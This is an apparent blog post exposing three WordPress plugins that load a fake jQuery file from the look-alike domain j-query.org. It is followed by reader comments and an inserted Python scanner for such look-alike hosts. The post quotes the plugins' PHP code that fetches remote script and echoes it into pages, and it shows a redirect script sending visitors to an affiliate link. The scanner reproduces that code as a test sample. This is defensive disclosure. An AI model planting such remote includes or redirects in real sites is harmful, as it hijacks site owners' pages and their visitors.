Beware Fake jQuery Inclusions by WordPress Plugins in the Repo

We received an email today from a WordPress user who wanted to alert us to a jQuery hack. At first, I’ve got to admit, I was a little bit sceptical, but I thought it was worth looking into. I was surprised by what I found.

We all love jQuery – sometimes I like to daydream about marrying it in some sort of exotic ceremony in Barbados. In fact, it’s so awesome that it’s become a little bit ubiquitous. There are so many plugins using jQuery that we’re totally used to finding it in them.

Normally a WordPress plugin will get jQuery from just a few places:

  • Google CDN
  • WordPress itself
  • Microsoft CDN
  • jQuery CDN

But what if you had a plugin that was getting its jQuery from http://j-query.org?

That seems pretty legit, right? I mean it’s got j-query in the damned domain! And when you visit it, you end up at http://jquery.org – the official site of jQuery.

Oh… wait…. http://j-query.org and http://jquery.org – they’re not the same, are they?

No, they’re not. And http://j-query.org isn’t even registered by the people at jQuery. It’s registered through Domains By Proxy, and forwards to servers at Media Temple.

So it’s got to be suspicious when you find three WordPress plugins that all contain this piece of code:

if (function_exists('curl_init')) {
    // Fetch a "jQuery" file from the look-alike domain j-query.org, not from jQuery's CDN
    $url = "http://www.j-query.org/jquery-1.6.3.min.js";
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    // Whatever the remote server sent back is written straight into the page
    echo "$data";
}

There are three plugins containing this code. They are:

All three of these plugins are from the same person – iintensemedia, who runs the site Iintense Media (also registered through Domains By Proxy, nameservers at Media Temple – doesn’t mean anything, am just sayin’, right?).

Let’s take a look at one of these in trac:

Quick coupon in the WordPress repo

Now, I expect you’ll go running off to that j-query link and then you’ll come running back and be all “Siobhan!” (and btw, it’s pronounced Shavonne – get it right before you shout at me plz. anyway…..) “Siobhan! It’s just a blank page! WTF?”

Yes, I am aware of that – it looks like the offending js has been removed. But a little bit of investigation tells us what it does.

1. The First Clue

Check out this forum thread in which the excited alexpike mentions to the dev that the plugin inserts the following into his header:

<script type="text/javascript">
    var now = new Date().getTime();
    if (now%8 == 0) {
        window.location = "http://trk.cpainfinity.com/SHD1";
    }
</script>

How does the dev respond?


2. The Plot Thickens

That’s not the only place where someone posted about noticing strange JS being added to their website. A member of the Black Hat World Forums was concerned when his website was hacked.

The member said that this file: http://www.j-query.org/jquery-1.6.4.min.js was propagating through his site as CPA Infinity affiliate links. CPA Infinity? Where have we seen that before? In the first clue, dingbats. These are affiliate backlinks to CPA Infinity.

Which means that someone has been making money with some fake http://j-query.org site which is fooling people into thinking that they’re getting some delicious jQuery but they’re actually sending about 1 in every 8 of your visitors to the CPA Infinity link.

Anyway, CPA Infinity didn’t seem to be too impressed about it as their founder has banned the user. Perhaps that’s why the js file is no longer working.

Update: A commenter has noted this link.

the link leads to a black hat seo page

Who’s behind it?

Obviously I couldn’t say. Iintensemedia seems like a good community-minded guy who is always looking for orphaned plugins to adopt. And not at all interested in Black Hat SEO:

Embedded tweet: http://twitter.com/#!/iintense/status/124490755342483456

What’s the Moral of the Story?

Well kids, every good story has got a good moral, and this one does too.

The WordPress Plugin Directory is not infallible. Things get in that can exploit your WordPress website. We’ve written about this before. Unfortunately it’s the case that while the Theme Directory has got strict review guidelines and a committed review team, the Plugin Directory has nothing comparable. We all trust the plugin directory implicitly (we recommended one of the above plugins ourselves) but maybe we aren’t right to do so. Our assumption that the plugin directory is the safest place to get a plugin from maybe isn’t correct. The plugin directory most definitely has its weaknesses, and its weaknesses are the weaknesses of everyone who runs their website on WordPress.

Install some security plugins to keep watch on your site, and be careful where you get your scripts from – you never know what you might catch! ;)

Were you affected by any of these plugins? We’d love to hear your story in the comments.

Comments (38)

  1. Great article! The WordPress team is usually good at checking/testing plugins (and themes) before they are accepted into the repository…..I’m surprised they are missing malicious plugins like this.

      • @Siobhan (Shavonne) Thanks for getting the word out and helping the legions of WordPress supporters like me be vigilant against these hacks. Just last week a well meaning member of the OC WordPress group did a shout out about a malware infested site of mine which made me wince – but in the end it brought everyone’s awareness up which can only be a good thing for the community. I think the Penn State saga reminded us of that recently.

    • I was just going to ask if anyone had reported this to WordPress directly, and was happy to see Otto’s post. (I tried “Liking” your post, but that option isn’t available.)

      After attending WCSF, we learned that blogging about a WordPress issue only broadcasts the vulnerability. The better option is letting WordPress know directly, and quietly. Not because they want to hide the issue, but again, they want to resolve it before hackers take advantage of it.

      Thanks again Otto!

      • Yes, when we have become aware of vulnerabilities in plugins in the past we have alerted the repo – and as there was a post on the forum I assumed that they had been alerted. Especially since the JS had been removed by the time we got to look at it. Also, this is not a vulnerability that any other hacker could take advantage of as it’s one guy who has set up a fake j-query site. It’s not a vulnerability with WordPress itself.

        In any case, the issue is one that WordPress users should be aware of. People should know that a fake jQuery link can leave their website vulnerable – I think it’s important to educate people about that. There was no reason not to post about it.

        • Thanks, I tried editing my post to correct “hacker” and a few other items. I also tried deleting it to repost, but that option wasn’t available either.

          Good to know you’ve notified WordPress in the past. :) And although this may not have been a vulnerability. I still liken it to showing those, with bad intent, possible options. But then again, this happens all over the internet, on TV, etc.

          Thanks for the heads-up.

    • Exactly, well pointed out. There’s really not a great deal of need for using external jQuery instead of just the one packaged with WordPress itself, especially when it often gets done incorrectly too.

  2. Lately, I’ve been giving more thought to this sort of vulnerability as I deal with more clients’ sites just full of activated plugins (some in use, some not even). Nice to have a clear case study for those discussions about paring back and managing what’s in use.

  3. I actually had the WP Facebook Events plugin installed on a new site I was tinkering with for the day job.

    After reading this I immediately deleted absolutely everything (luckily I had not done too much to the site)

    However it is a little bit frightening how these things can happen, but (there is always a but) I don’t think it’s a time to panic though in fairness. With the amount of plugins being released and the popularity of WordPress in general you are always going to get opportunists looking to exploit less savvy users. So a couple slipped through the net.

    Just employ best practice and do your research before you even install it: is there a forum for the plugin? Is it regularly updated? Is there an active community of others having issues? If so avoid it.

    I now download all plugins and install them on a test site and go through them just to make 100% sure, but then I can be quite anal!

    Cheers

    Ben

    • @Saru, the method you’d use depends on the type of access you have to the server. One method is to search for the domain name in a BASH shell:
      find . -type f | xargs -i grep -l 'j-query.org' {}

      If it’s a Windows machine, the best way is to use Agent Ransack (awesome search tool for Windows).

      If you only have FTP access, then you’ve got a couple of options. The more time consuming (but more accurate) method is to download the entire site to your desktop and search for the domain name or ‘bad code’ that way. Another method (though more limited by server constraints) is via a WordPress plugin such as the TimThumb vulnerability scanner (minor changes to its source would allow free-form all file searches).
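The search above and the article's short list of legitimate jQuery sources can be combined into a small scanner. The following is an added example, not code from the original post or from any of the plugins it discusses: it walks a plugin or wp-content directory, extracts every http(s) URL, and flags hosts that read as "jquery" once hyphens are stripped but are not on an allowlist of known CDN hosts, and it separately flags the curl_init-plus-echo pattern quoted in the article. The concrete CDN hostnames, the function names and the two sample PHP strings are my assumptions; the samples are constructed, with the first modelled on the article's snippet.

```python
import os
import re
import sys
from urllib.parse import urlparse

# Assumption: the article names the providers (Google CDN, WordPress itself,
# Microsoft CDN, jQuery CDN); the concrete hostnames below are my choice.
# A script enqueued from WordPress itself is served locally, so it carries
# no http URL and never reaches this check.
ALLOWED_HOSTS = {
    "ajax.googleapis.com",  # Google CDN
    "code.jquery.com",      # jQuery CDN
    "ajax.aspnetcdn.com",   # Microsoft CDN
    "ajax.microsoft.com",   # older Microsoft CDN hostname
}

URL_RE = re.compile(r"""https?://[^\s"'<>()]+""", re.IGNORECASE)
# The pattern quoted in the article: curl_init() fetches a remote .js file
# and the response body is echoed straight into the page.
CURL_RE = re.compile(r"curl_init\s*\(", re.IGNORECASE)
ECHO_RE = re.compile(r"\becho\s+[\"'$]", re.IGNORECASE)


def normalize_host(host):
    """Lower-case the host and drop a leading 'www.' so hosts compare cleanly."""
    host = (host or "").lower()
    return host[4:] if host.startswith("www.") else host


def is_lookalike(host):
    """True when the host reads as 'jquery' once hyphens are removed but is
    not a known CDN host, e.g. j-query.org or jquery-cdn.example."""
    h = normalize_host(host)
    if h in ALLOWED_HOSTS:
        return False
    return "jquery" in h.replace("-", "")


def scan_text(text, path="<inline>"):
    """Return (path, kind, detail) findings for one file's contents."""
    findings = []
    for m in URL_RE.finditer(text):
        url = m.group(0)
        if is_lookalike(urlparse(url).hostname):
            findings.append((path, "lookalike-jquery-host", url))
    if CURL_RE.search(text) and ECHO_RE.search(text) and ".js" in text:
        findings.append((path, "curl-fetch-and-echo-js", ""))
    return findings


def scan_tree(root, exts=(".php", ".js", ".html")):
    """Walk a plugin or wp-content directory and scan every source file."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_text(fh.read(), path))
    return findings


# Constructed samples: the first is modelled on the snippet quoted in the
# article, the second shows a plugin loading jQuery from WordPress or a CDN.
SAMPLE_BAD_PHP = '''<?php
if (function_exists('curl_init')) {
    $url = "http://www.j-query.org/jquery-1.6.3.min.js";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $data = curl_exec($ch);
    curl_close($ch);
    echo "$data";
}
'''
SAMPLE_GOOD_PHP = '''<?php
wp_enqueue_script('jquery');
wp_enqueue_script('cdn-jquery', 'https://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js');
'''

if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = scan_tree(sys.argv[1])
    else:
        results = (scan_text(SAMPLE_BAD_PHP, "sample-bad.php")
                   + scan_text(SAMPLE_GOOD_PHP, "sample-good.php"))
    for path, kind, detail in results:
        print(f"{path}: {kind} {detail}".rstrip())
```

Run it with a path to wp-content/plugins to scan a real install, or with no arguments to see the two constructed samples classified. Hits are for a person to review, not an automatic verdict: the allowlist is deliberately small, so a plugin that legitimately links to jquery.org in its readme will show up too, and the curl-plus-echo rule only says that a file fetches something remote and prints it, which is what made the quoted snippet worth a second look.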

  4. Shavonne!

    Now I can *finally* quit hurting my neck trying to pronounce your name. I wasn’t even close. In fact, I’m pretty sure I never said it the same way twice when I spoke of you (ALWAYS in glowing terms BTW). =)

    Thanks for this great article. I didn’t use any of these, but I came close to using the event plugin. How spooky that something like this would get through.

    ~ Corey

  5. Hello, I am receiving the following message on my site: Web Server at j-query.orr was not found! I am reading this now my website has been a victim of these people. How can I identify what file contains this code? I am running a wordpress site, I already deactivated all my plugins to see if one of those had it but the message is still appearing on the home page. Any help would be appreciated!

      • The original was in the WP repo area but I think, and I am not sure as I manage so many sites, but we upgraded the plugin recently and I think that is when it became injected. I tested a number of my other sites and it does not seem to be a problem with those.

  6. Damn, great set of catches. And quite worrying really, all in all.

    But also a bit of a problem from an entirely different angle, as we used that Facebook events plugin :( Question now is that of finding a replacement – and checking details just in case.

    I don’t suppose anyone has any suggestions for an alternative?
